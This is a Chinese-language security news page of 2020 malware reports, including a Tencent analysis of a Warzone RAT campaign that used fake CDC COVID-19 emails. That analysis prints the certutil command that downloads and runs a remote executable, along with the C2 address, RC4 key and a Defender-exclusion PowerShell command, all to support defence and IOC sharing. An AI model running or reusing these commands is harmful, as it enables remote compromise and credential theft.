分类: 恶意软件

安全研究人员再次对恶意软件 xHelper 发出警告

安全研究人员再次对难以删除的恶意程序 xHelper 发出警告。过去一年,xHelper 主要通过第三方应用商店在俄罗斯、欧洲和西南亚运行 Android 6 和 7 的设备上传播。一旦安装它就难以卸载了,即使设备恢复到出厂设置也无法清除它。 当它伪装成合法应用安装到设备上之后,它会通过互联网下载一个木马收集信息,然后下载另一个木马,再利用一组漏洞利用代码获得设备的 root 权限。 这组漏洞利用代码主要针对中国制造的  Android 6 和 7 的设备。获得 root 权限之后,恶意程序会挂载到启用写访问的操作系统分区,改变 mount() 函数代码,防止其遭到删除。 要彻底删除 xHelper 可能需要完全抹掉设备上的文件,重新安装一个干净的版本,恢复出厂设置无法消灭它。   (稿源:cnBeta,封面源自网络。)

OpenWRT 被发现使用 HTTP 连接传输更新 易遭受中间人攻击

安全研究员报告,流行的路由器发行版 OpenWRT 容易受到远程代码执行攻击,原因是它的更新是通过未加密渠道传输的,其数字签名验证很容易绕过。OpenWRT 被广泛用于路由器和其它嵌入式系统。 安全研究员 Guido Vranken 发现它的更新和安装文件是通过 HTTP 连接传输的,容易受到中间人攻击,攻击者可以用恶意更新文件去替换合法更新文件。 除此之外,它的数字签名检查和验证也很容易绕过,验证函数 checksum_hex2bin 存在 bug,在输入字符串前加空格可绕过检查,该 bug 是在 2017 年 2 月引入的。 组合这两个弱点攻击者可以向设备发送恶意更新并自动安装。OpenWRT 维护者已经释出了更新部分修复了问题。   (稿源:solidot,封面源自网络。)

新 COVID-9 恶意程序会删除计算机数据

安全研究人员发现了至少五种 COVID-19 主题的恶意程序,其中四种设计是去破坏被感染的计算机,删除文件或覆写主引导记录,还有一种可能只是测试或恶作剧。第一种能覆写主引导的新冠恶意程序是 MalwareHunterTeam 发现的,名字就叫 COVID-19.exe;第二种则伪装成勒索软件,但其主要功能是窃取密码。 MalwareHunterTeam 还报告了数据删除的新冠主题恶意程序,其中一种使用中文文件名,可能设计针对中文用户,还不清楚这种恶意程序是否广泛传播或只是测试。   (稿源:solidot,封面源自网络。)

警惕假冒美国 CDC 发送新冠疫情的邮件投递商业木马 Warzone RAT

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/TRY4-1aUf5gTLHOWQ7PWuQ   一、背景 腾讯安全威胁情报中心检测到有黑客利用新冠肺炎(Covid-19)疫情相关的诱饵文档攻击外贸行业。黑客伪造美国疾病控制和预防中心(CDC)作为发件人,投递附带Office公式编辑器漏洞的文档至目标邮箱,收件人在存在Office公式编辑器漏洞(CVE-2017-11882)的电脑上打开文档,就可能触发漏洞下载商业远控木马Warzone RAT。 Warzone RAT是在网络上公开销售的商业木马软件,具有密码采集、远程执行任意程序、键盘记录、远程桌面控制、上传下载文件、远程打开摄像头等多种远程控制功能,并且还可以在包括Win10在内的Windows系统上进行特权提升。 根据腾讯安全威胁情报中心数据,该病毒从3月23日开始传播,目前已有广东、上海、湖北等地的外贸企业受到黑客钓鱼邮件的攻击。腾讯安全专家提醒企业用户小心处理不明邮件,建议网管使用腾讯T-Sec高级威胁检测系统检测黑客攻击,客户端可采用腾讯T-Sec终端安全管理系统或腾讯电脑管家拦截病毒。 二、样本分析 攻击邮件伪装成美国疾病控制和预防中心(cdc.gov)发送关于Covid-19的重要更新通知,将漏洞利用的DOC Word文件命名为COVID-19 – nCoV – Special Update.doc,引导收件人打开查看。 此时如果用户在没有安全防护软件,且使用没有修复CVE-2017-11882漏洞的Office打开此文档,就会触发漏洞中的恶意代码,然后恶意代码从C2服务器下载并运行木马病毒。文档下载木马的命令为: CmD /C cErTuTiL -uRlCAchE -sPlIT -f http[:]//getegroup.com/file.exe %TMP%\\1.exe&start %TMP%\\1.exe File.exe外壳程序采样C#编写,代码经过高度混淆,运行时经过两次解密在内存中Invoke执行最终的PE文件,该PE通过分析可确认为商业远控木马Warzone RAT。 Warzone RAT最早2018年在warzone[.]io上公开出现,目前在warzone[.]pw上提供销售。Warzone RAT商业木马软件具有以下功能: 可通过VNC进行远程桌面控制 可通过RDPWrap进行隐藏的远程桌面控制 特权升级(包括最新的Win10系统) 远程开启摄像头 盗取浏览器密码(Chrome,Firefox,IE,Edge,Outlook,Thunderbird,Foxmail) 下载、执行任意文件 离线键盘记录器或实时键盘记录器 远程shell 文件管理 进程管理 反向连接 三、窃密 Warzone RAT木马窃密功能包含窃取各类浏览器登陆使用的账号密码以及邮件客户端保存的账号信息。 获取保存在Chrome中的账号密码信息。 获取保存在IE浏览器中的账号密码信息。 获取OutLook邮箱中的账号密码信息。 获取Thunderbird邮箱中的账号密码信息。 获取Firefo浏览器中的账号密码信息。 四、特权提升 如果Warzone RAT以提升的特权运行,则会使用以下PowerShell命令将指定路径添加到Windows Defender的排除项中: powershell Add-MpPreference -ExclusionPath 对于Windows 10以下的版本,使用存储在其资源WM_DSP中的模块进行UAC绕过。 该模块代码最终使用pkgmgr.exe以更高的特权加载恶意程序。 对于Windows 10则利用sdclt.exe 的权限自动提升功能,该功能在Windows备份和还原机制的上下文中使用。 五、远程控制 解密出C2地址:phantom101.duckdns.org:5200,与该地址建立连接成为受控机,使电脑完全被黑客控制。 与服务器进行TCP通信,传输数据使用RC4加密算法加密,密钥为”warzone160”。 与控制端通信的部分协议命令和含义如下: C&C 操作 2 枚举进程信息 4 枚举磁盘信息 6 枚举文件 8 读取文件 10 删除文件 12 杀死进程 14 远程Shell 20 开启摄像头 26 卸载木马 28 上传文件 32 从浏览器获取密码 34 下载并执行程序 36 键盘记录(在线) 38 键盘记录(离线) 40 RDP 42 建立反向连接 44 反向连接断开 48 Socket设置 58 执行文件 60 读取日志 六、安全建议 1、建议不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描; 2、安装CVE-2017-11882漏洞补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 3、 禁用公式编辑器组件: a) 可以通过运行如下命令禁用Office编辑器: reg add"HKLMSOFTWAREMicrosoftOfficeCommonCOMCompatibility{0002CE02-0000-0000-C000-0000 b) 对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令: reg add"HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}"/v "Compatibility Flags" /t REG_DWORD /d 0x400 4、企业网管,可以设置拦截以下邮件发件人的邮件。 de.iana@aol.com shenzhen@faithfulinc.com 5、推荐企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)对黑客攻击行为进行检测。 腾讯T-Sec高级威胁检测系统,是基于腾讯安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统,该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接:https://cloud.tencent.com/product/nta 6、企业终端系统保护 终端电脑可部署腾讯T-Sec终端安全管理系统(御点)拦截病毒木马攻击,更多信息参考链接:https://s.tencent.com/product/yd/index.html。 IOCs C&C phantom101.duckdns.org:5200 MD5 76387fb419cebcfb4b2b42e6dc544e8b 55b75cf1235c3345a62f79d8c824c571 030e95d974c5026499ca159055b2dfa6 URL http://getegroup.com/file.exe 参考链接 https://www.freebuf.com/column/156458.html https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

假装成新冠病毒应用的勒索软件正在威胁着人们的钱包

据外媒报道,新冠病毒大流行给相当一部分人带来了困惑。为了更好地应对这种情况,一些人开始使用移动应用来跟踪疾病的传播。然而这些用户惊讶地发现,他们可能不小心安装了一个恶意软件应用。 一款叫做“COVID19 Tracker”的Android应用就向担心病毒爆发的人们宣传自己是病毒地图。用户在搜索一个显示病毒传播的应用时得到了COVID19 Tracker的链接。然而用户无法在Google Play Store上下载这款应用而需要前往该应用网站。当用户下载并打开应用时他们会迎来一个令人不快的意外。跟其他应用一样,COVID19 Tracker也要求获得设备许可,但一旦获得许可它就会启动一个名为“CovidLock”的程序。CovidLock则会发出威胁,要求用户在48小时内以比特币的形式支付100美元,否则的话将删除其手机上的所有数据。 CovidLock是一种被称为勒索软件的恶意软件,它会劫持用户的数据一直到用户支付赎金为止。通常情况系啊,勒索软件都会把企业作为目标,因为它们有更大的财力或能力,但CovidLock针对的是个人用户。 据了解,CovidLock在被用户打开后会给用户的手机上锁,之后用户只有输入解密密钥才能使用。如果用户通过屏幕上的一个链接支付了比特币赎金,该应用就会向用户提供密钥。网络安全公司DomainTools通过对该应用进行反向工程找到了解密代码:4865083501。 实际上,自2016年Android Nougat发布以来,Android手机就内置了针对CovidLock等屏幕锁定攻击的保护。但如果用户没有为他们的手机设置密码那么这些保护措施将无法起到作用。 另外,DomainTools还设法访问了连接到CovidLock的比特币钱包。该团队正在监视发生在上面的任何活动以此查看黑客是否成功勒索到了钱。当地时间3月16日,COVID19 Tracker网站已被关闭。 实际上,COVID19 Tracker并不是唯一一个跟新冠病毒相关的恶意软件。另一款名为“Corona Live 1.1”的Android应用虽然提供了实际的病毒数据,但它会在用户的手机上安装间谍软件。跟COVID19 Tracker一样,用户必须从应用网站或第三方应用商店下载到Corona Live 1.1,而不能通过Google Play store下载。 虽然假冒应用和其他形式的恶意软件可能正在增加,但用户可以采取措施来避开它们。为了获得关于新冠病毒传播的信息,人们应该只求助于可靠的来源,比如官方医疗机构和政府机构,它们对此都有准确的数据。另外,下载的移动应用只能来自于官方应用商城而非第三方。 最近的一项研究发现,名字跟新冠病毒相关的应用和网站传播恶意软件的可能性比其他域名高出50%。 即使是最基本的安全措施也能有效地防止恶意软件和假冒应用的传播。如果用户启用了他们手机中的所有安全功能并限制应用权限,那么他们就避开许多潜在的安全问题。   (稿源:cnBeta,封面源自网络。)

FireEye:多数勒索软件会选择在 IT 人员不上班时发动攻击

根据网络安全公司 FireEye 发布的最新报告:为了最大程度地提高攻击效率,绝大多数勒索软件都会选择在正常上班时间之外采取行动,以避免被 IT 人员发现并扫除。在 FireEye 调查的案例中,76% 的勒索软件是在周末、或者上午 8 点 ~ 下午 6 点之外的时间段完成部署的。 FireEye 表示:通常情况下,IT 人员不会在上述时间段内上班,因此响应效率会变得更慢。在某些情况下,比如传统节假日或周末,一些企业根本不会安排任何 IT 人员值班。 数据还显示,在大约 75% 的事件中,从恶意活动到勒索软件的部署,至少会间隔三天左右的时间。这意味着,若是 IT 部门的响应足够迅速,就有很大的可能性避免感染。 不过这家网络安全公司预计,未来勒索软件感染的数量将继续增加。更糟糕的是,威胁行为发起者会不断升级赎金要求,甚至将勒索软件攻击与其它策略结合起来,比如针对关键业务系统和窃取数据。 如上文所示,破局的关键,是能否在恶意软件的部署和破坏之间介入。若信息技术专家能够及时发现并消除威胁(或让系统具有防止受到威胁的能力),便可转移大部分与勒索软件相关的应对成本。   (稿源:cnBeta,封面源自网络。)

疫情追踪应用暗藏 Covid Lock 勒索软件 下载安装请留心

随着新冠病毒引发的 COVID-19 疫情在全球的爆发,各种鱼龙混杂的“疫情追踪器”也开始盯上粗心的移动设备用户。一旦被名为 CovidLock 的勒索软件给劫持,用户将不得不支付 100 美元的赎金,以解锁他们的 Android 智能机。 据悉,这款勒索软件会锁定受害者的手机屏幕并更改设备密码。如果此前未设定密码,CovidLock 还会自动设置一个密码,以迫使用户就范。 DomainTools 分析称,受害者必须支付相当于 100 美元的 BTC 赎金才能解锁他们的智能手机,否则将窃取照片、联系人之类的敏感信息,甚至在网络上泄露一部分细节。 截图文字显示 —— 你的手机已被加密,请在 48 小时内支付 100 美元的 BTC,否则包括联系人、照片、视频等在内的所有内容将被删除,所有社交媒体账户会被公开、且本机存储将被完全抹除。 此外攻击者警告称 —— 你的 GPS 已被监视,我们已知晓你的位置。如尝试进行任何愚蠢的操作,手机将触发自毁。 好消息是,通过逆向工程,DomainTools 已经搞定了这款勒索软件的解锁密钥,此外研究团队正密切关注攻击者的 BTC 钱包,更多细节将很快公布。 对于普通用户来说,谨记远离任何不信任的应用来源,并仔细检查手机已安装的每款 App 的权限设置。   (稿源:cnBeta,封面源自网络。)

卡巴斯基曝光两款 Android 恶意软件 可控制用户 Facebook 账户

安全大厂卡巴斯基刚刚公布了两款危害 Android 设备的新型恶意软件,警告其可能控制用户的 Facebook 等社交媒体账户。受感染的机器会向攻击者敞开用户社交帐户的访问权限,并被广泛应用于垃圾邮件和网络钓鱼等活动。更糟糕的是,两款恶意软件会协同工作,并逐步对用户设备展开破坏。 第一款恶意软件会尝试在受感染的 Android 设备上取得 root 权限,使得网络犯罪分子能够提取 Facebook 的 cookie,并将之上传到受控服务器。 卡巴斯基指出,通常情况下,仅拥有账号 ID 是不足以控制用户账户的。网站已经采取了一些安全措施,以阻止可疑的登陆尝试。 第二款 Android 木马可在受感染的设备上设置代理服务器,使得攻击者能够绕过安全措施,从而实现对设备的几乎完全控制,以染指受害者的社交媒体账户。 庆幸的是,只有少数人受到 Cookiethief 的威胁。但估计过不了多久,类似的攻击方法会变得越来越普遍。 卡巴斯基恶意软件分析师 Igor Golovin 表示:通过结合这两种方法,攻击者可在不引起受害者明显怀疑的情况下达成对 cookie 信息的窃取和账户的控制。 尽管这是一个相对较新的威胁,迄今为止的受害者只有 1000 人左右,但这一数字仍可能进一步增长,尤其是网站很难检测到行为的异常。 尽管我们在日常的网页浏览过程中不怎么关注,但 cookie 信息其实无处不在。作为处理个人信息的一种方法,其旨在收集线上的有关数据。 最后,卡巴斯基建议用户应养成良好的习惯,始终通过受信任的来源下载应用、阻止第三方 cookie 访问并定期清除,以充分抵御此类攻击。   (稿源:cnBeta,封面源自网络。)

首款破解 2FA 的 Android 恶意程序曝光:可窃取银行帐号

上月,总部位于阿姆斯特丹的网络安全公司ThreatFabric发现了名为Cerberus的恶意程序。它是有史以来首款能够成功窃取Google Authenticator应用程序生成的2FA(两因素身份验证)代码功能的Android恶意软件。该软件目前正在开发过程中,目前没有证据表明已用于实际攻击。 研究人员表示,该恶意程序混合了银行木马和远程访问木马(RAT)特性。一旦Android用户被感染,黑客便会使用该恶意软件的银行木马功能来窃取移动银行应用程序的帐号凭据。 ThreatFabric的报告指出,远程访问特洛伊木马(Cerberus)是在6月底首次发现的,它取代了Anubis木马,并逐渐成为一种主要的恶意软件即服务产品。 报告指出,Cerberus在2020年1月中旬进行了更新,新版本引入了从Google Authenticator窃取2FA令牌以及设备屏幕锁定PIN码和滑动方式的功能。 即使用户账户受到2FA(Google Authenticator生成)保护,恶意程序Cerberus可以通过RAT功能手动连接到用户设备。然后,黑客将打开Authenticator应用程序,生成一次性密码,截取这些代码的屏幕截图,然后访问该用户的帐户。 安全团队表示:“启用窃取设备的屏幕锁定凭据(PIN和锁定模式)的功能由一个简单的覆盖层提供支持,该覆盖层将要求受害者解锁设备。从RAT的实现中,我们可以得出结论,建立此屏幕锁定凭据盗窃是为了使参与者能够远程解锁设备,以便在受害者不使用设备时进行欺诈。这再次显示了罪犯创造成功所需的正确工具的创造力。” 在本周发表的研究中,来自Nightwatch Cybersecurity的研究人员深入研究了导致这种攻击的根本原因,即Authenticator应用程序首先允许对其内容进行屏幕截图。 Android操作系统允许应用程序阻止其他应用程序截屏其内容,从而保护其用户。这是通过在应用程序的配置中添加“ FLAG_SECURE”选项来完成的。Google并未将此标记添加到Authenticator的应用中,尽管该应用通常处理一些非常敏感的内容。 Nightwatch研究人员表示,谷歌早在2014年的10月就收到了相关的问题报告,当时有用户在GitHub上注意到这个错误配置。2017年,Nightwatch在2017年的时候又向谷歌的安全团队报告了相同的问题,此外还发现微软的Authenticator同样存在能够截图问题。   (稿源:cnBeta,封面源自网络。)

FBI 称勒索软件受害者向攻击者支付了超过 1.4 亿美元

联邦调查局(FBI)是RSA 2020会议的参与者之一,,IBM和AT&T等大公司都参加了该会议。今年,由于冠状病毒的爆发,该会议缺乏主要技术巨头的参与,但联邦调查局依然派员参加了有关安全的活动。在活动中,FBI发布了一个有趣的统计数据,他们声称勒索软件受害者在过去6年中已向攻击者支付了超过1.4亿美元。该机构通过分析比特币钱包和赎金来得出这个数字。 FBI特工乔尔·德卡普阿(Joel DeCapua)在两场会议上介绍了他的发现,解释了他如何分析比特币钱包以得出数字。根据DeCapua的说法,在2013年10月至2019年11月之间,受害者已向勒索软件攻击者支付了约144350000美元的比特币。 最赚钱的勒索软件是Ryuk,带来了6126万美元的“获利”。紧随其后的是Ryuk,其次是Crysis / Dharma,其收入为2448万美元,而Bitpaymer为804万美元。 FBI指出,赎金数额可能更高,因为他们没有办法获取到完整的数据。大多数公司试图隐藏这些细节,以防止负面新闻报道并损害其股价。 DeCapua还透露,Windows远程桌面协议(RDP)是攻击者用来访问受害者计算机的最常用方法。 联邦调查局的建议 鉴于通过RDP途径方式的受害者占比高达70-80%,因此FBI建议组织使用网络级身份验证(NLA)来提供额外的保护,技术人员还建议组织在其RDP帐户上使用复杂的密码并尽快检查更新以为应用程序和操作系统安装最新版本。研究人员通常会在漏洞修复后发布概念验证,以便任何不良行为者都可以使用它来攻击尚未更新的系统。 最后,FBI强调了识别网络钓鱼网站并确保其具有数据备份的重要性,以防止成为勒索软件攻击的受害者。   (稿源:cnBeta,封面源自网络。)